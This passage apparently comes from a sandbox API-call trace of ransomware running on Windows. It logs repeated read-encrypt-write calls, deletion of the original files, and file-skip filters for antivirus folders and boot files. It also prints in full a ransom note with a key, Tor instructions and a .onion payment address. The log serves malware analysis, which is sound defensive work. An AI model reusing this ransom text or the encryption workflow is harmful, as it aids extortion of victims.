(in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.162] CryptEncrypt (in: hKey=0x9ad5f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0161.162] GetLastError () returned 0x0 [0161.162] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0161.162] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.162] CryptEncrypt (in: hKey=0x9ad5f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0161.162] GetLastError () returned 0x0 [0161.162] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0161.162] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.162] CryptEncrypt (in: hKey=0x9ad5f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0161.162] GetLastError () returned 0x0 [0161.162] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0161.162] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.162] CryptEncrypt (in: hKey=0x9ad5f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0161.162] GetLastError () returned 0x0 [0161.162] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0161.162] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.162] CryptEncrypt (in: hKey=0x9ad5f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0161.163] GetLastError () returned 0x0 [0161.163] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0161.163] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.163] CryptEncrypt (in: hKey=0x9ad5f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0161.163] GetLastError () returned 0x0 [0161.163] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0161.163] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.163] CryptEncrypt (in: hKey=0x9ad5f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0161.163] GetLastError () returned 0x0 [0161.163] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0161.163] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.163] CryptEncrypt (in: hKey=0x9ad5f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0161.163] GetLastError () returned 0x0 [0161.163] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0161.163] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.163] CryptEncrypt (in: hKey=0x9ad5f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0161.163] GetLastError () returned 0x0 [0161.163] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0161.163] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.163] CryptEncrypt (in: hKey=0x9ad5f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0161.163] GetLastError () returned 0x0 [0161.163] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0161.163] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.163] CryptEncrypt (in: hKey=0x9ad5f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0161.163] GetLastError () returned 0x0 [0161.163] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0161.164] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.164] CryptEncrypt (in: hKey=0x9ad5f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0161.164] GetLastError () returned 0x0 [0161.164] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0161.164] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.164] CryptEncrypt (in: hKey=0x9ad5f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0161.164] GetLastError () returned 0x0 [0161.164] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0161.164] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.164] CryptEncrypt (in: hKey=0x9ad5f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0161.164] GetLastError () returned 0x0 [0161.164] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0161.164] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.164] CryptEncrypt (in: hKey=0x9ad5f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x110) returned 1 [0161.164] GetLastError () returned 0x0 [0161.164] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x110, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x110, lpOverlapped=0x0) returned 1 [0161.164] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x0, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x0, lpOverlapped=0x0) returned 1 [0161.164] WriteFile (in: hFile=0x588, lpBuffer=0x29012e8*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesWritten=0x2d7e15c*=0x0, lpOverlapped=0x0) returned 1 [0161.164] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\tr-TR\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\tr-tr\\tipresx.dll.mui")) returned 0x20 [0161.165] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\tr-TR\\tipresx.dll.mui", dwFileAttributes=0x20) returned 0 [0161.165] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\tr-TR\\tipresx.dll.mui") returned 1 [0161.165] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\tr-TR\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\tr-tr\\tipresx.dll.mui")) returned 0 [0161.165] wcscpy (in: _Dest=0x2d7dcb4, _Source="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\tr-TR\\tipresx.dll.mui" | out: _Dest="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\tr-TR\\tipresx.dll.mui") returned="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\tr-TR\\tipresx.dll.mui" [0161.165] PathRemoveFileSpecW (in: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\tr-TR\\tipresx.dll.mui" | out: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\tr-TR") returned 1 [0161.165] GetTempFileNameW (in: lpPathName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\tr-TR", lpPrefixString=".xX", uUnique=0x0, lpTempFileName=0x2d7debc | out: lpTempFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\tr-TR\\.xXE8E6.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\tr-tr\\.xxe8e6.tmp")) returned 0xe8e6 [0161.166] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\tr-TR\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\tr-tr\\tipresx.dll.mui"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\tr-TR\\.xXE8E6.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\tr-tr\\.xxe8e6.tmp"), dwFlags=0x1) returned 0 [0161.167] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\tr-TR\\.xXE8E6.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\tr-tr\\.xxe8e6.tmp")) returned 1 [0161.167] CryptDestroyKey (hKey=0x9ad5f8) returned 1 [0161.167] wcslen (_String="OK") returned 0x2 [0161.167] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0161.167] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0161.167] CryptDestroyKey (hKey=0x9ad5b8) returned 1 [0161.167] CryptDestroyHash (hHash=0x9ad178) returned 1 [0161.167] CryptReleaseContext (hProv=0x8e2e68, dwFlags=0x0) returned 1 [0161.167] FindNextFileW (in: hFindFile=0x9ad578, lpFindFileData=0x2d7e3bc | out: lpFindFileData=0x2d7e3bc) returned 0 [0161.167] GetLastError () returned 0x12 [0161.167] FindClose (in: hFindFile=0x9ad578 | out: hFindFile=0x9ad578) returned 1 [0161.167] _wfopen (_FileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\tr-TR\\Recovers your files.html" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\tr-tr\\recovers your files.html"), _Mode="w") returned 0x77ac1268 [0161.168] fputs (in: _Str=" Encrypted files!

Your Key: a8ba77dad846516d1a6737c4237beea3b25e325279bbf473010960209657e13a

Encrypted files!

All your files are encrypted.Using AES256-bit encryption and RSA-2048-bit encryption.
Making it impossible to recover files without the correct private key.
If you are interested in getting is the key and recover your files
You should proceed with the following steps.

The only way to decrypt your files safely is to buy the Descrypt and Private Key software.

Any attempts to restore your files with the third-party software will be fatal for your files!

Important use Firefox or Chrome browser

To proceed with the purchase you must access one of the link below

If neither of the links is online for a long period of time, there is another way to open it, you should install the Tor Browser

If your personal page is not available for a long period there is another way to open your personal page - installation and use of Tor Browser:

  1. run your Internet browser (if you do not know what it is run the Internet Explorer);
  2. enter or copy the address https://www.torproject.org/download/download-easy.html.en into the address bar of your browser and press ENTER;
  3. wait for the site loading;
  4. on the site you will be offered to download Tor Browser; download and run it, follow the installation instructions, wait until the installation is completed;
  5. run Tor Browser;
  6. connect with the button 'Connect' (if you use the English version);
  7. a normal Internet browser window will be opened after the initialization;
  8. type or copy the address

    https://lylh3uqyzay3lhrd.onion

    in this browser address bar;
  9. press ENTER;
  10. the site should be loaded; if for some reason the site is not loading wait for a moment and try again.
If you have any problems during installation or use of Tor Browser, please, visit https://www.youtube.com and type request in the search bar 'Install Tor Browser Windows' and you will find a lot of training videos about Tor Browser installation and use.

Your Key: a8ba77dad846516d1a6737c4237beea3b25e325279bbf473010960209657e13a
", _File=0x77ac1268 | out: _File=0x77ac1268) returned 0 [0161.168] fclose (in: _File=0x77ac1268 | out: _File=0x77ac1268) returned 0 [0161.168] wcslen (_String="Unfortunately crypted files: ") returned 0x1d [0161.168] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0161.168] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0161.168] wcslen (_String="Fortunately ignored files because of filters: ") returned 0x2e [0161.168] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0161.168] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0161.169] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\uk-UA\\*", pszSpec="*.exe") returned 0 [0161.169] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\uk-UA\\*", pszSpec="*.dll") returned 0 [0161.169] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\uk-UA\\*", pszSpec="*.lnk") returned 0 [0161.169] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\uk-UA\\*", pszSpec="*.bat") returned 0 [0161.169] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\uk-UA\\*", pszSpec="*.ini") returned 0 [0161.169] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\uk-UA\\*", pszSpec="*.msi") returned 0 [0161.169] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\uk-UA\\*", pszSpec="*.scf") returned 0 [0161.169] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\uk-UA\\*", pszSpec="*pagefile.sys*") returned 0 [0161.169] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\uk-UA\\*", pszSpec="*NTUSER.DAT*") returned 0 [0161.169] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\uk-UA\\*", pszSpec="*AppData*") returned 0 [0161.169] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\uk-UA\\*", pszSpec="*\\winrar\\*") returned 0 [0161.169] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\uk-UA\\*", pszSpec="*\\Internet Explorer\\*") returned 0 [0161.169] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\uk-UA\\*", pszSpec="*\\java\\*") returned 0 [0161.169] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\uk-UA\\*", pszSpec="*\\TeamViewer\\*") returned 0 [0161.169] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\uk-UA\\*", pszSpec="*\\windows\\*") returned 0 [0161.169] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\uk-UA\\*", pszSpec="*\\ESET\\*") returned 0 [0161.169] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\uk-UA\\*", pszSpec="*\\AVG\\*") returned 0 [0161.169] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\uk-UA\\*", pszSpec="*\\AVIRA\\*") returned 0 [0161.169] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\uk-UA\\*", pszSpec="*\\AVAST Software\\*") returned 0 [0161.169] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\uk-UA\\*", pszSpec="*Atheros*") returned 0 [0161.169] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\uk-UA\\*", pszSpec="*Realtek*") returned 0 [0161.169] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\uk-UA\\*", pszSpec="*bootmgr*") returned 0 [0161.169] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\uk-UA\\*", pszSpec="*boot*") returned 0 [0161.169] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\uk-UA\\*", pszSpec="*boot*") returned 0 [0161.169] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\uk-UA\\*", pszSpec="*CONFIG.SYS*") returned 0 [0161.169] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\uk-UA\\*", pszSpec="*IO.SYS*") returned 0 [0161.169] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\uk-UA\\*", pszSpec="*MSDOS.SYS*") returned 0 [0161.169] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\uk-UA\\*", pszSpec="*NTDETECT.COM*") returned 0 [0161.169] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\uk-UA\\*", pszSpec="*ntldr*") returned 0 [0161.169] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\uk-UA\\*", pszSpec="*chrome*") returned 0 [0161.169] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\uk-UA\\*", pszSpec="*opera*") returned 0 [0161.169] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\uk-UA\\*", pszSpec="*firefox*") returned 0 [0161.169] wcslen (_String="\\\\?\\") returned 0x4 [0161.169] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\uk-UA\\*", lpFindFileData=0x2d7e3bc | out: lpFindFileData=0x2d7e3bc) returned 0x9ad4b8 [0161.169] wcscmp (_String1=".", _String2=".") returned 0 [0161.169] FindNextFileW (in: hFindFile=0x9ad4b8, lpFindFileData=0x2d7e3bc | out: lpFindFileData=0x2d7e3bc) returned 1 [0161.169] wcscmp (_String1="..", _String2=".") returned 1 [0161.169] wcscmp (_String1="..", _String2="..") returned 0 [0161.170] FindNextFileW (in: hFindFile=0x9ad4b8, lpFindFileData=0x2d7e3bc | out: lpFindFileData=0x2d7e3bc) returned 1 [0161.170] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*NMCRYPT") returned 0 [0161.170] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*Recovers your files.html") returned 0 [0161.170] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*.exe") returned 0 [0161.170] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*.dll") returned 0 [0161.170] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*.lnk") returned 0 [0161.170] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*.bat") returned 0 [0161.170] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*.ini") returned 0 [0161.170] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*.msi") returned 0 [0161.170] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*.scf") returned 0 [0161.170] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*pagefile.sys*") returned 0 [0161.170] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*NTUSER.DAT*") returned 0 [0161.170] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*AppData*") returned 0 [0161.170] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\winrar\\*") returned 0 [0161.170] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\Internet Explorer\\*") returned 0 [0161.170] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\java\\*") returned 0 [0161.170] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\TeamViewer\\*") returned 0 [0161.170] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\windows\\*") returned 0 [0161.170] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\ESET\\*") returned 0 [0161.170] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\AVG\\*") returned 0 [0161.170] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\AVIRA\\*") returned 0 [0161.170] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\AVAST Software\\*") returned 0 [0161.170] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*Atheros*") returned 0 [0161.170] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*Realtek*") returned 0 [0161.170] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*bootmgr*") returned 0 [0161.170] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*boot*") returned 0 [0161.170] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*boot*") returned 0 [0161.170] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*CONFIG.SYS*") returned 0 [0161.170] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*IO.SYS*") returned 0 [0161.170] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*MSDOS.SYS*") returned 0 [0161.170] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*NTDETECT.COM*") returned 0 [0161.170] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*ntldr*") returned 0 [0161.170] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*chrome*") returned 0 [0161.170] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*opera*") returned 0 [0161.170] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*firefox*") returned 0 [0161.170] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\uk-UA\\tipresx.dll.mui", pszSpec="*") returned 1 [0161.170] strlen (_Str="NMoreira") returned 0x8 [0161.170] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.170] 